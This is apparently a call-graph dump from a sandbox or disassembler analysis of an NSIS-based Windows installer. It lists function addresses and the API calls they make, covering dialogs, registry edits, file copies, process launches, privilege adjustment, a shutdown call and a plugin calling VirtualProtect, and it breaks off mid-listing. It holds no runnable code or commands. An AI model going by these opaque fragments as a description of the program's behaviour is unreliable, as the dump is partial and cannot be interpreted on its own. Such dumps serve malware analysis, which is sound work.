40158c 5625->5627 5626->5627 5628 40159a ShowWindow 5627->5628 5629 402ac5 5627->5629 5628->5629 5630 401cf3 5631 402c1f 17 API calls 5630->5631 5632 401cf9 IsWindow 5631->5632 5633 401a20 5632->5633 5634 402df3 5635 402e05 SetTimer 5634->5635 5636 402e1e 5634->5636 5635->5636 5637 402e6c 5636->5637 5638 402e72 MulDiv 5636->5638 5639 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5638->5639 5639->5637 5641 4014f5 SetForegroundWindow 5642 402ac5 5641->5642 5643 402576 5644 402c41 17 API calls 5643->5644 5645 40257d 5644->5645 5648 405ede GetFileAttributesW CreateFileW 5645->5648 5647 402589 5648->5647 5649 401b77 5650 401bc8 5649->5650 5652 401b84 5649->5652 5653 401bf2 GlobalAlloc 5650->5653 5654 401bcd 5650->5654 5651 401c0d 5656 40640a 17 API calls 5651->5656 5662 4022f7 5651->5662 5652->5651 5657 401b9b 5652->5657 5655 40640a 17 API calls 5653->5655 5654->5662 5670 4063e8 lstrcpynW 5654->5670 5655->5651 5658 4022f1 5656->5658 5668 4063e8 lstrcpynW 5657->5668 5663 405a4e MessageBoxIndirectW 5658->5663 5660 401bdf GlobalFree 5660->5662 5663->5662 5664 401baa 5669 4063e8 lstrcpynW 5664->5669 5666 401bb9 5671 4063e8 lstrcpynW 5666->5671 5668->5664 5669->5666 5670->5660 5671->5662 5672 4024f8 5673 402c81 17 API calls 5672->5673 5674 402502 5673->5674 5675 402c1f 17 API calls 5674->5675 5676 40250b 5675->5676 5677 402533 RegEnumValueW 5676->5677 5678 402527 RegEnumKeyW 5676->5678 5679 40288b 5676->5679 5680 402548 RegCloseKey 5677->5680 5678->5680 5680->5679 5228 40167b 5229 402c41 17 API calls 5228->5229 5230 401682 5229->5230 5231 402c41 17 API calls 5230->5231 5232 40168b 5231->5232 5233 402c41 17 API calls 5232->5233 5234 401694 MoveFileW 5233->5234 5235 4016a0 5234->5235 5236 4016a7 5234->5236 5238 401423 24 API calls 5235->5238 5237 40672b 2 API calls 5236->5237 5240 402250 5236->5240 5239 4016b6 5237->5239 5238->5240 5239->5240 5241 4061ae 36 API calls 5239->5241 5241->5235 5682 73c622fd 5683 73c62367 5682->5683 5684 73c62372 GlobalAlloc 5683->5684 5685 73c62391 5683->5685 5684->5683 5693 401e7d 5694 402c41 17 API calls 5693->5694 5695 401e83 5694->5695 5696 402c41 17 API calls 5695->5696 5697 401e8c 5696->5697 5698 402c41 17 API calls 5697->5698 5699 401e95 5698->5699 5700 402c41 17 API calls 5699->5700 5701 401e9e 5700->5701 5702 401423 24 API calls 5701->5702 5703 401ea5 5702->5703 5710 405a14 ShellExecuteExW 5703->5710 5705 40288b 5706 401ee7 5706->5705 5711 406873 WaitForSingleObject 5706->5711 5708 401f01 CloseHandle 5708->5705 5710->5706 5712 40688d 5711->5712 5713 40689f GetExitCodeProcess 5712->5713 5714 4067fe 2 API calls 5712->5714 5713->5708 5715 406894 WaitForSingleObject 5714->5715 5715->5712 5716 4019ff 5717 402c41 17 API calls 5716->5717 5718 401a06 5717->5718 5719 402c41 17 API calls 5718->5719 5720 401a0f 5719->5720 5721 401a16 lstrcmpiW 5720->5721 5722 401a28 lstrcmpW 5720->5722 5723 401a1c 5721->5723 5722->5723 5724 401000 5725 401037 BeginPaint GetClientRect 5724->5725 5726 40100c DefWindowProcW 5724->5726 5728 4010f3 5725->5728 5729 401179 5726->5729 5730 401073 CreateBrushIndirect FillRect DeleteObject 5728->5730 5731 4010fc 5728->5731 5730->5728 5732 401102 CreateFontIndirectW 5731->5732 5733 401167 EndPaint 5731->5733 5732->5733 5734 401112 6 API calls 5732->5734 5733->5729 5734->5733 5735 401503 5736 40150b 5735->5736 5738 40151e 5735->5738 5737 402c1f 17 API calls 5736->5737 5737->5738 4389 402104 4390 402c41 17 API calls 4389->4390 4391 40210b 4390->4391 4392 402c41 17 API calls 4391->4392 4393 402115 4392->4393 4394 402c41 17 API calls 4393->4394 4395 40211f 4394->4395 4396 402c41 17 API calls 4395->4396 4397 402129 4396->4397 4398 402c41 17 API calls 4397->4398 4400 402133 4398->4400 4399 402172 CoCreateInstance 4404 402191 4399->4404 4400->4399 4401 402c41 17 API calls 4400->4401 4401->4399 4402 401423 24 API calls 4403 402250 4402->4403 4404->4402 4404->4403 5739 402484 5740 402c81 17 API calls 5739->5740 5741 40248e 5740->5741 5742 402c41 17 API calls 5741->5742 5743 402497 5742->5743 5744 4024a2 RegQueryValueExW 5743->5744 5747 40288b 5743->5747 5745 4024c8 RegCloseKey 5744->5745 5746 4024c2 5744->5746 5745->5747 5746->5745 5750 40632f wsprintfW 5746->5750 5750->5745 4747 403e86 4748 403fd9 4747->4748 4749 403e9e 4747->4749 4750 40402a 4748->4750 4751 403fea GetDlgItem GetDlgItem 4748->4751 4749->4748 4752 403eaa 4749->4752 4754 404084 4750->4754 4764 401389 2 API calls 4750->4764 4753 40435f 18 API calls 4751->4753 4755 403eb5 SetWindowPos 4752->4755 4756 403ec8 4752->4756 4759 404014 SetClassLongW 4753->4759 4760 4043ab SendMessageW 4754->4760 4778 403fd4 4754->4778 4755->4756 4757 403ee5 4756->4757 4758 403ecd ShowWindow 4756->4758 4761 403f07 4757->4761 4762 403eed DestroyWindow 4757->4762 4758->4757 4763 40140b 2 API calls 4759->4763 4786 404096 4760->4786 4765 403f0c SetWindowLongW 4761->4765 4766 403f1d 4761->4766 4817 4042e8 4762->4817 4763->4750 4767 40405c 4764->4767 4765->4778 4770 403fc6 4766->4770 4771 403f29 GetDlgItem 4766->4771 4767->4754 4772 404060 SendMessageW 4767->4772 4768 40140b 2 API calls 4768->4786 4769 4042ea DestroyWindow EndDialog 4769->4817 4827 4043c6 4770->4827 4774 403f59 4771->4774 4775 403f3c SendMessageW IsWindowEnabled 4771->4775 4772->4778 4773 404319 ShowWindow 4773->4778 4779 403f66 4774->4779 4781 403fad SendMessageW 4774->4781 4782 403f79 4774->4782 4790 403f5e 4774->4790 4775->4774 4775->4778 4777 40640a 17 API calls 4777->4786 4779->4781 4779->4790 4781->4770 4783 403f81 4782->4783 4784 403f96 4782->4784 4787 40140b 2 API calls 4783->4787 4788 40140b 2 API calls 4784->4788 4785 403f94 4785->4770 4786->4768 4786->4769 4786->4777 4786->4778 4789 40435f 18 API calls 4786->4789 4808 40422a DestroyWindow 4786->4808 4818 40435f 4786->4818 4787->4790 4791 403f9d 4788->4791 4789->4786 4824 404338 4790->4824 4791->4770 4791->4790 4793 404111 GetDlgItem 4794 404126 4793->4794 4795 40412e ShowWindow KiUserCallbackDispatcher 4793->4795 4794->4795 4821 404381 KiUserCallbackDispatcher 4795->4821 4797 404158 EnableWindow 4802 40416c 4797->4802 4798 404171 GetSystemMenu EnableMenuItem SendMessageW 4799 4041a1 SendMessageW 4798->4799 4798->4802 4799->4802 4801 403e67 18 API calls 4801->4802 4802->4798 4802->4801 4822 404394 SendMessageW 4802->4822 4823 4063e8 lstrcpynW 4802->4823 4804 4041d0 lstrlenW 4805 40640a 17 API calls 4804->4805 4806 4041e6 SetWindowTextW 4805->4806 4807 401389 2 API calls 4806->4807 4807->4786 4809 404244 CreateDialogParamW 4808->4809 4808->4817 4810 404277 4809->4810 4809->4817 4811 40435f 18 API calls 4810->4811 4812 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4811->4812 4813 401389 2 API calls 4812->4813 4814 4042c8 4813->4814 4814->4778 4815 4042d0 ShowWindow 4814->4815 4816 4043ab SendMessageW 4815->4816 4816->4817 4817->4773 4817->4778 4819 40640a 17 API calls 4818->4819 4820 40436a SetDlgItemTextW 4819->4820 4820->4793 4821->4797 4822->4802 4823->4804 4825 404345 SendMessageW 4824->4825 4826 40433f 4824->4826 4825->4785 4826->4825 4828 404489 4827->4828 4829 4043de GetWindowLongW 4827->4829 4828->4778 4829->4828 4830 4043f3 4829->4830 4830->4828 4831 404420 GetSysColor 4830->4831 4832 404423 4830->4832 4831->4832 4833 404433 SetBkMode 4832->4833 4834 404429 SetTextColor 4832->4834 4835 404451 4833->4835 4836 40444b GetSysColor 4833->4836 4834->4833 4837 404458 SetBkColor 4835->4837 4838 404462 4835->4838 4836->4835 4837->4838 4838->4828 4839 404475 DeleteObject 4838->4839 4840 40447c CreateBrushIndirect 4838->4840 4839->4840 4840->4828 5751 401f06 5752 402c41 17 API calls 5751->5752 5753 401f0c 5752->5753 5754 405450 24 API calls 5753->5754 5755 401f16 5754->5755 5756 4059d1 2 API calls 5755->5756 5757 401f1c 5756->5757 5758 401f3f CloseHandle 5757->5758 5759 406873 5 API calls 5757->5759 5761 40288b 5757->5761 5758->5761 5762 401f31 5759->5762 5762->5758 5764 40632f wsprintfW 5762->5764 5764->5758 5765 404809 5766 404819 5765->5766 5767 40483f 5765->5767 5768 40435f 18 API calls 5766->5768 5769 4043c6 8 API calls 5767->5769 5770 404826 SetDlgItemTextW 5768->5770 5771 40484b 5769->5771 5770->5767 4876 40230c 4877 402314 4876->4877 4878 40231a 4876->4878 4879 402c41 17 API calls 4877->4879 4880 402328 4878->4880 4881 402c41 17 API calls 4878->4881 4879->4878 4883 402c41 17 API calls 4880->4883 4884 402336 4880->4884 4881->4880 4882 402c41 17 API calls 4885 40233f WritePrivateProfileStringW 4882->4885 4883->4884 4884->4882 5772 40190c 5773 401943 5772->5773 5774 402c41 17 API calls 5773->5774 5775 401948 5774->5775 5776 405afa 67 API calls 5775->5776 5777 401951 5776->5777 5778 401f8c 5779 402c41 17 API calls 5778->5779 5780 401f93 5779->5780 5781 4067c2 5 API calls 5780->5781 5782 401fa2 5781->5782 5783 401fbe GlobalAlloc 5782->5783 5785 402026 5782->5785 5784 401fd2 5783->5784 5783->5785 5786 4067c2 5 API calls 5784->5786 5787 401fd9 5786->5787 5788 4067c2 5 API calls 5787->5788 5789 401fe3 5788->5789 5789->5785 5793 40632f wsprintfW 5789->5793 5791 402018 5794 40632f wsprintfW 5791->5794 5793->5791 5794->5785 4893 40238e 4894 4023c1 4893->4894 4895 402396 4893->4895 4897 402c41 17 API calls 4894->4897 4909 402c81 4895->4909 4898 4023c8 4897->4898 4905 402cff 4898->4905 4901 4023a7 4903 402c41 17 API calls 4901->4903 4902 4023d5 4904 4023ae RegDeleteValueW RegCloseKey 4903->4904 4904->4902 4906 402d13 4905->4906 4907 402d0c 4905->4907 4906->4907 4914 402d44 4906->4914 4907->4902 4910 402c41 17 API calls 4909->4910 4911 402c98 4910->4911 4912 406255 RegOpenKeyExW 4911->4912 4913 40239d 4912->4913 4913->4901 4913->4902 4915 406255 RegOpenKeyExW 4914->4915 4916 402d72 4915->4916 4917 402dec 4916->4917 4922 402d76 4916->4922 4917->4907 4918 402d98 RegEnumKeyW 4919 402daf RegCloseKey 4918->4919 4918->4922 4920 4067c2 5 API calls 4919->4920 4923 402dbf 4920->4923 4921 402dd0 RegCloseKey 4921->4917 4922->4918 4922->4919 4922->4921 4924 402d44 6 API calls 4922->4924 4925 402de0 RegDeleteKeyW 4923->4925 4926 402dc3 4923->4926 4924->4922 4925->4917 4926->4917 4978 40558f 4979 4055b0 GetDlgItem GetDlgItem GetDlgItem 4978->4979 4980 405739 4978->4980 5024 404394 SendMessageW 4979->5024 4982 405742 GetDlgItem CreateThread CloseHandle 4980->4982 4983 40576a 4980->4983 4982->4983 5027 405523 5 API calls 4982->5027 4985 405795 4983->4985 4986 405781 ShowWindow ShowWindow 4983->4986 4987 4057ba 4983->4987 4984 405620 4993 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4984->4993 4988 4057a1 4985->4988 4989 4057f5 4985->4989 5026 404394 SendMessageW 4986->5026 4992 4043c6 8 API calls 4987->4992 4990 4057a9 4988->4990 4991 4057cf ShowWindow 4988->4991 4989->4987 5001 405803 SendMessageW 4989->5001 4995 404338 SendMessageW 4990->4995 4997 4057e1 4991->4997 4998 4057ef 4991->4998 4996 4057c8 4992->4996 4999 405695 4993->4999 5000 405679 SendMessageW SendMessageW 4993->5000 4995->4987 5002 405450 24 API calls 4997->5002 5003 404338 SendMessageW 4998->5003 5004 4056a8 4999->5004 5005 40569a SendMessageW 4999->5005 5000->4999 5001->4996 5006 40581c CreatePopupMenu 5001->5006 5002->4998 5003->4989 5008 40435f 18 API calls 5004->5008 5005->5004 5007 40640a 17 API calls 5006->5007 5010 40582c AppendMenuW 5007->5010 5009 4056b8 5008->5009 5013 4056c1 ShowWindow 5009->5013 5014 4056f5 GetDlgItem SendMessageW 5009->5014 5011 405849 GetWindowRect 5010->5011 5012 40585c TrackPopupMenu 5010->5012 5011->5012 5012->4996 5015 405877 5012->5015 5016 4056e4 5013->5016 5017 4056d7 ShowWindow 5013->5017 5014->4996 5018 40571c SendMessageW SendMessageW 5014->5018 5019 405893 SendMessageW 5015->5019 5025 404394 SendMessageW 5016->5025 5017->5016 5018->4996 5019->5019 5020 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5019->5020 5022 4058d5 SendMessageW 5020->5022 5022->5022 5023 4058fe GlobalUnlock SetClipboardData CloseClipboard 5022->5023 5023->4996 5024->4984 5025->5014 5026->4985 5795 40190f 5796 402c41 17 API calls 5795->5796 5797 401916 5796->5797 5798 405a4e MessageBoxIndirectW 5797->5798 5799 40191f 5798->5799 5800 401491 5801 405450 24 API calls 5800->5801 5802 401498 5801->5802 5217 405a14 ShellExecuteExW 5810 401d14 5811 402c1f 17 API calls 5810->5811 5812 401d1b 5811->5812 5813 402c1f 17 API calls 5812->5813 5814 401d27 GetDlgItem 5813->5814 5815 402592 5814->5815 5218 73c62993 5219 73c629e3 5218->5219 5220 73c629a3 VirtualProtect 5218->5220 5220->5219 5816 404495 lstrcpynW lstrlenW 5817 403a96 5818 403aa1 5817->5818 5819 403aa5 5818->5819 5820 403aa8 GlobalAlloc 5818->5820 5820->5819 5821 402598 5822 4025c7 5821->5822 5823 4025ac 5821->5823 5825 4025fb 5822->5825 5826 4025cc 5822->5826 5824 402c1f 17 API calls 5823->5824 5833 4025b3 5824->5833 5828 402c41 17 API calls 5825->5828 5827 402c41 17 API calls 5826->5827 5829 4025d3 WideCharToMultiByte lstrlenA 5827->5829 5830 402602 lstrlenW 5828->5830 5829->5833 5830->5833 5831 402645 5832 40262f 5832->5831 5834 405f90 WriteFile 5832->5834 5833->5831 5833->5832 5835 405fbf 5 API calls 5833->5835 5834->5831 5835->5832 5836 40451e 5837 404536 5836->5837 5843 404650 5836->5843 5844 40435f 18 API calls 5837->5844 5838 4046ba 5839 404784 5838->5839 5840 4046c4 GetDlgItem 5838->5840 5846 4043c6 8 API calls 5839->5846 5841 404745 5840->5841 5842 4046de 5840->5842 5841->5839 5851 404757 5841->5851 5842->5841 5850 404704 SendMessageW LoadCursorW SetCursor 5842->5850 5843->5838 5843->5839 5847 40468b GetDlgItem SendMessageW 5843->5847 5845 40459d 5844->5845 5848 40435f 18 API calls 5845->5848 5849 40477f 5846->5849 5869 404381 KiUserCallbackDispatcher 5847->5869 5853 4045aa CheckDlgButton 5848->5853 5870 4047cd 5850->5870 5855 40476d 5851->5855 5856 40475d SendMessageW 5851->5856 5867 404381 KiUserCallbackDispatcher 5853->5867 5855->5849 5861 404773 SendMessageW 5855->5861 5856->5855 5857 4046b5 5858 4047a9 SendMessageW 5857->5858 5858->5838 5861->5849 5862 4045c8 GetDlgItem 5868 404394 SendMessageW 5862->5868 5864 4045de SendMessageW 5865 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5864->5865 5866 4045fb GetSysColor 5864->5866 5865->5849 5866->5865 5867->5862 5868->5864 5869->5857 5873 405a14 ShellExecuteExW 5870->5873 5872 404733 LoadCursorW SetCursor 5872->5841 5873->5872 5874 40149e 5875 4022f7 5874->5875 5876 4014ac PostQuitMessage 5874->5876 5876->5875 5877 401c1f 5878 402c1f 17 API calls 5877->5878 5879 401c26 5878->5879 5880 402c1f 17 API calls 5879->5880 5881 401c33 5880->5881 5882 401c48 5881->5882 5883 402c41 17 API calls 5881->5883 5884 401c58 5882->5884 5885 402c41 17 API calls 5882->5885 5883->5882 5886 401c63 5884->5886 5887 401caf 5884->5887 5885->5884 5889 402c1f 17 API calls 5886->5889 5888 402c41 17 API calls 5887->5888 5890 401cb4 5888->5890 5891 401c68 5889->5891 5893 402c41 17 API calls 5890->5893 5892 402c1f 17 API calls 5891->5892 5894 401c74 5892->5894 5895 401cbd FindWindowExW 5893->5895 5896 401c81 SendMessageTimeoutW 5894->5896 5897 401c9f SendMessageW 5894->5897 5898 401cdf 5895->5898 5896->5898 5897->5898 5899 402aa0 SendMessageW 5900 402ac5 5899->5900 5901 402aba InvalidateRect 5899->5901 5901->5900 5902 402821 5903 402827 5902->5903 5904 402ac5 5903->5904 5905 40282f FindClose 5903->5905 5905->5904 4385 4015a3 4386 402c41 17 API calls 4385->4386 4387 4015aa SetFileAttributesW 4386->4387 4388 4015bc 4387->4388 4494 4034a5 SetErrorMode GetVersion 4495 4034e4 4494->4495 4496 4034ea 4494->4496 4497 4067c2 5 API calls 4495->4497 4498 406752 3 API calls 4496->4498 4497->4496 4499 403500 lstrlenA 4498->4499 4499->4496 4500 403510 4499->4500 4501 4067c2 5 API calls 4500->4501 4502 403517 4501->4502 4503 4067c2 5 API calls 4502->4503 4504 40351e 4503->4504 4505 4067c2 5 API calls 4504->4505 4506 40352a #17 OleInitialize SHGetFileInfoW 4505->4506 4584 4063e8 lstrcpynW 4506->4584 4509 403576 GetCommandLineW 4585 4063e8 lstrcpynW 4509->4585 4511 403588 4512 405cea CharNextW 4511->4512 4513 4035ad CharNextW 4512->4513 4514 4036d7 GetTempPathW 4513->4514 4519 4035c6 4513->4519 4586 403474 4514->4586 4516 4036ef 4517 4036f3 GetWindowsDirectoryW lstrcatW 4516->4517 4518 403749 DeleteFileW 4516->4518 4520 403474 12 API calls 4517->4520 4596 402f30 GetTickCount GetModuleFileNameW 4518->4596 4521 405cea CharNextW 4519->4521 4528 4036c2 4519->4528 4529 4036c0 4519->4529 4523 40370f 4520->4523 4521->4519 4523->4518 4524 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4523->4524 4527 403474 12 API calls 4524->4527 4525 40375d 4530 403800 4525->4530 4534 405cea CharNextW 4525->4534 4538 403810 4525->4538 4532 403741 4527->4532 4682 4063e8 lstrcpynW 4528->4682 4529->4514 4626 403ad8 4530->4626 4532->4518 4532->4538 4548 40377c 4534->4548 4536 40394a 4540 403952 GetCurrentProcess OpenProcessToken 4536->4540 4541 4039ce ExitProcess 4536->4541 4537 40382a 4694 405a4e 4537->4694 4685 4039e6 4538->4685 4546 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4540->4546 4547 40399e 4540->4547 4544 403840 4550 4059b9 5 API calls 4544->4550 4545 4037da 4549 405dc5 18 API calls 4545->4549 4546->4547 4551 4067c2 5 API calls 4547->4551 4548->4544 4548->4545 4552 4037e6 4549->4552 4553 403845 lstrcatW 4550->4553 4554 4039a5 4551->4554 4552->4538 4683 4063e8 lstrcpynW 4552->4683 4555 403861 lstrcatW lstrcmpiW 4553->4555 4556 403856 lstrcatW 4553->4556 4557 4039ba ExitWindowsEx 4554->4557 4558 4039c7 4554->4558 4555->4538 4560 40387d 4555->4560 4556->4555 4557->4541 4557->4558 4703 40140b 4558->4703 4563 403882 4560->4563 4564 403889 4560->4564 4562 4037f5 4684 4063e8 lstrcpynW 4562->4684 4566 40591f 4 API calls 4563->4566 4567 40599c 2 API calls 4564->4567 4569 403887 4566->4569 4568 40388e SetCurrentDirectoryW 4567->4568 4570 4038a9 4568->4570 4571 40389e 4568->4571 4569->4568 4699 4063e8 lstrcpynW 4570->4699 4698 4063e8 lstrcpynW 4571->4698 4574 40640a 17 API calls 4575 4038e8 DeleteFileW 4574->4575 4576 4038f5 CopyFileW 4575->4576 4581 4038b7 4575->4581 4576->4581 4577 40393e 4578 4061ae 36 API calls 4577->4578 4578->4538 4579 4061ae 36 API calls 4579->4581 4580 40640a 17 API calls 4580->4581 4581->4574 4581->4577 4581->4579 4581->4580 4583 403929 CloseHandle 4581->4583 4700 4059d1 CreateProcessW 4581->4700 4583->4581 4584->4509 4585->4511 4587 40667c 5 API calls 4586->4587 4588 403480 4587->4588 4589 40348a 4588->4589 4590 405cbd 3 API calls 4588->4590 4589->4516 4591 403492 4590->4591 4592 40599c 2 API calls 4591->4592 4593 403498 4592->4593 4706 405f0d 4593->4706 4710 405ede GetFileAttributesW CreateFileW 4596->4710 4598 402f73 4625 402f80 4598->4625 4711 4063e8 lstrcpynW 4598->4711 4600 402f96 4601 405d09 2 API calls 4600->4601 4602 402f9c 4601->4602 4712 4063e8 lstrcpynW 4602->4712 4604 402fa7 GetFileSize 4605 4030a8 4604->4605 4623 402fbe 4604->4623 4606 402e8e 32 API calls 4605->4606 4607 4030af 4606->4607 4609 4030eb GlobalAlloc 4607->4609 4607->4625 4714 40345d SetFilePointer 4607->4714 4608 403447 ReadFile 4608->4623 4613 403102 4609->4613 4610 403143 4611 402e8e 32 API calls 4610->4611 4611->4625 4615 405f0d 2 API calls 4613->4615 4614 4030cc 4616 403447 ReadFile 4614->4616 4618 403113 CreateFileW 4615->4618 4619 4030d7 4616->4619 4617 402e8e 32 API calls 4617->4623 4620 40314d 4618->4620 4618->4625 4619->4609 4619->4625 4713 40345d SetFilePointer 4620->4713 4622 40315b 4624 4031d6 44 API calls 4622->4624 4623->4605 4623->4608 4623->4610 4623->4617 4623->4625 4624->4625 4625->4525 4627 4067c2 5 API calls 4626->4627 4628 403aec 4627->4628 4629 403af2 4628->4629 4630 403b04 4628->4630 4730 40632f wsprintfW 4629->4730 4631 4062b6 3 API calls 4630->4631 4632 403b34 4631->4632 4633 403b53 lstrcatW 4632->4633 4635 4062b6 3 API calls 4632->4635 4636 403b02 4633->4636 4635->4633 4715 403dae 4636->4715 4639 405dc5 18 API calls 4641 403b85 4639->4641 4640 403c19 4642 405dc5 18 API calls 4640->4642 4641->4640 4643 4062b6 3 API calls 4641->4643 4644 403c1f 4642->4644 4645 403bb7 4643->4645 4646 403c2f LoadImageW 4644->4646 4647 40640a 17 API calls 4644->4647 4645->4640 4652 403bd8 lstrlenW 4645->4652 4653 405cea CharNextW 4645->4653 4648 403cd5 4646->4648 4649 403c56 RegisterClassW 4646->4649 4647->4646 4651 40140b 2 API calls 4648->4651 4650 403c8c SystemParametersInfoW CreateWindowExW 4649->4650 4681 403cdf 4649->4681 4650->4648 4656 403cdb 4651->4656 4654 403be6 lstrcmpiW 4652->4654 4655 403c0c 4652->4655 4657 403bd5 4653->4657 4654->4655 4658 403bf6 GetFileAttributesW 4654->4658 4659 405cbd 3 API calls 4655->4659 4661 403dae 18 API calls 4656->4661 4656->4681 4657->4652 4660 403c02 4658->4660 4662 403c12 4659->4662 4660->4655 4663 405d09 2 API calls 4660->4663 4664 403cec 4661->4664 4731 4063e8 lstrcpynW 4662->4731 4663->4655 4666 403cf8 ShowWindow 4664->4666 4667 403d7b 4664->4667 4669 406752 3 API calls 4666->4669 4723 405523 OleInitialize 4667->4723 4671 403d10 4669->4671 4670 403d81 4672 403d85 4670->4672 4673 403d9d 4670->4673 4674 403d1e GetClassInfoW 4671->4674 4678 406752 3 API calls 4671->4678 4680 40140b 2 API calls 4672->4680 4672->4681 4677 40140b 2 API calls 4673->4677 4675 403d32 GetClassInfoW RegisterClassW 4674->4675 4676 403d48 DialogBoxParamW 4674->4676 4675->4676 4679 40140b 2 API calls 4676->4679 4677->4681 4678->4674 4679->4681 4680->4681 4681->4538 4682->4529 4683->4562 4684->4530 4686 403a01 4685->4686 4687 4039f7 CloseHandle 4685->4687 4688 403a15 4686->4688 4689 403a0b CloseHandle 4686->4689 4687->4686 4743 403a43 4688->4743 4689->4688 4692 405afa 67 API calls 4693 403819 OleUninitialize 4692->4693 4693->4536 4693->4537 4695 405a63 4694->4695 4696 403838 ExitProcess 4695->4696 4697 405a77 MessageBoxIndirectW 4695->4697 4697->4696 4698->4570 4699->4581 4701 405a10 4700->4701 4702 405a04 CloseHandle 4700->4702 4701->4581 4702->4701 4704 401389 2 API calls 4703->4704 4705 401420 4704->4705 4705->4541 4707 405f1a GetTickCount GetTempFileNameW 4706->4707 4708 405f50 4707->4708 4709 4034a3 4707->4709 4708->4707 4708->4709 4709->4516 4710->4598 4711->4600 4712->4604 4713->4622 4714->4614 4716 403dc2 4715->4716 4732 40632f wsprintfW 4716->4732 4718 403e33 4733 403e67 4718->4733 4720 403b63 4720->4639 4721 403e38 4721->4720 4722 40640a 17 API calls 4721->4722 4722->4721 4736 4043ab 4723->4736 4725 40556d 4726 4043ab SendMessageW 4725->4726 4727 40557f OleUninitialize 4726->4727 4727->4670 4729 405546 4729->4725 4739 401389 4729->4739 4730->4636 4731->4640 4732->4718 4734 40640a 17 API calls 4733->4734 4735 403e75 SetWindowTextW 4734->4735 4735->4721 4737 4043c3 4736->4737 4738 4043b4 SendMessageW 4736->4738 4737->4729 4738->4737 4741 401390 4739->4741 4740 4013fe 4740->4729 4741->4740 4742 4013cb MulDiv SendMessageW 4741->4742 4742->4741 4744 403a51 4743->4744 4745 403a1a 4744->4745 4746 403a56 FreeLibrary GlobalFree 4744->4746 4745->4692 4746->4745 4746->4746 5906 404ba6 5907 404bd2 5906->5907 5908 404bb6 5906->5908 5910 404c05 5907->5910 5911 404bd8 SHGetPathFromIDListW 5907->5911 5917 405a32 GetDlgItemTextW 5908->5917 5913 404bef SendMessageW 5911->5913 5914 404be8 5911->5914 5912 404bc3 SendMessageW 5912->5907 5913->5910 5916 40140b 2 API calls 5914->5916 5916->5913 5917->5912 5932 4029a8 5933 402c1f 17 API calls 5932->5933 5934 4029ae 5933->5934 5935 4029d5 5934->5935 5936 4029ee 5934->5936 5941 40288b 5934->5941 5937 4029da 5935->5937 5938 4029eb 5935->5938 5939 402a08 5936->5939 5940 4029f8 5936->5940 5946 4063e8 lstrcpynW 5937->5946 5938->5941 5947 40632f wsprintfW 5938->5947 5942 40640a 17 API calls 5939->5942 5943 402c1f 17 API calls 5940->5943 5942->5938 5943->5938 5946->5941 5947->5941 5955 401a30 5956 402c41 17 API calls 5955->5956 5957 401a39 ExpandEnvironmentStringsW 5956->5957 5958 401a4d 5957->5958 5960 401a60 5957->5960 5959 401a52 lstrcmpW 5958->5959 5958->5960 5959->5960 5028 402032 5029 402044 5028->5029 5030 4020f6 5028->5030 5031 402c41 17 API calls 5029->5031 5032 401423 24 API calls 5030->5032 5033 40204b 5031->5033 5039 402250 5032->5039 5034 402c41 17 API calls 5033->5034 5035 402054 5034->5035 5036 40206a LoadLibraryExW 5035->5036 5037 40205c GetModuleHandleW 5035->5037 5036->5030 5038 40207b 5036->5038 5037->5036 5037->5038 5051 406831 WideCharToMultiByte 5038->5051 5042 4020c5 5046 405450 24 API calls 5042->5046 5043 40208c 5044 402094 5043->5044 5045 4020ab 5043->5045 5047 401423 24 API calls 5044->5047 5054 73c61777 5045->5054 5048 40209c 5046->5048 5047->5048 5048->5039 5049 4020e8 FreeLibrary 5048->5049 5049->5039 5052 40685b GetProcAddress 5051->5052 5053 402086 5051->5053 5052->5053 5053->5042 5053->5043 5055 73c617aa 5054->5055 5096 73c61b5f 5055->5096 5057 73c617b1 5058 73c618d6 5057->5058 5059 73c617c2 5057->5059 5060 73c617c9 5057->5060 5058->5048 5146 73c62352 5059->5146 5130 73c62394 5060->5130 5065 73c6180f 5159 73c62569 5065->5159 5066 73c6182d 5071 73c61833 5066->5071 5072 73c6187e 5066->5072 5067 73c617df 5070 73c617e5 5067->5070 5076 73c617f0 5067->5076 5068 73c617f8 5082 73c617ee 5068->5082 5156 73c62d37 5068->5156 5070->5082 5140 73c62aac 5070->5140 5176 73c615c6 5071->5176 5074 73c62569 10 API calls 5072->5074 5083 73c6186f 5074->5083 5075 73c61815 5170 73c615b4 5075->5170 5150 73c62724 5076->5150 5082->5065 5082->5066 5087 73c618c5 5083->5087 5182 73c6252c 5083->5182 5084 73c6181b 5173 73c61272 5084->5173 5085 73c617f6 5085->5082 5086 73c62569 10 API calls 5086->5083 5087->5058 5089 73c618cf GlobalFree 5087->5089 5089->5058 5093 73c618b1 5093->5087 5186 73c6153d wsprintfW 5093->5186 5094 73c618aa FreeLibrary 5094->5093 5189 73c6121b GlobalAlloc 5096->5189 5098 73c61b83 5190 73c6121b GlobalAlloc 5098->5190 5100 73c61da9 GlobalFree GlobalFree GlobalFree 5102 73c61dc6 5100->5102 5118 73c61e10 5100->5118 5101 73c61b8e 5101->5100 5105 73c61c64 GlobalAlloc 5101->5105 5107 73c61caf lstrcpyW 5101->5107 5108 73c61ccd GlobalFree 5101->5108 5111 73c61cb9 lstrcpyW 5101->5111 5114 73c620ec 5101->5114 5116 73c62064 5101->5116 5101->5118 5122 73c61d0b 5101->5122 5123 73c61fa5 GlobalFree 5101->5123 5126 73c6122c 2 API calls 5101->5126 5103 73c62192 5102->5103 5104 73c61ddb 5102->5104 5102->5118 5106 73c621b4 GetModuleHandleW 5103->5106 5103->5118 5104->5118 5193 73c6122c 5104->5193 5105->5101 5109 73c621c5 LoadLibraryW 5106->5109 5110 73c621da 5106->5110 5107->5111 5108->5101 5109->5110 5109->5118 5197 73c6161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5110->5197 5111->5101 5113 73c6222c 5117 73c62239 lstrlenW 5113->5117 5113->5118 5114->5118 5124 73c62134 lstrcpyW 5114->5124 5196 73c6121b GlobalAlloc 5116->5196 5198 73c6161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5117->5198 5118->5057 5119 73c621ec 5119->5113 5128 73c62216 GetProcAddress 5119->5128 5122->5101 5191 73c6158f GlobalSize 